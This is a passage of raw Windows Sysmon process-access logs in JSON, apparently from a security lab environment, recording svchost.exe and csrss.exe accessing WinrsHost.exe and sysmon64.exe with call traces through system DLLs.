C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.204","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F8C-5F25-0000-0010DF7C0400}","TargetProcessId":"4388","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2523,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.204\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F8C-5F25-0000-0010DF7C0400}\r\nTargetProcessId: 4388\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.204","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F8C-5F25-0000-0010DF7C0400}","TargetProcessId":"4388","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2524,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.204\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.204","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2525,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.204\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.204","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2526,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.204\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.204","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2527,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.204\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.204","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2528,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.204\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.204","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2529,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.204\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.204","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2530,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.204\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 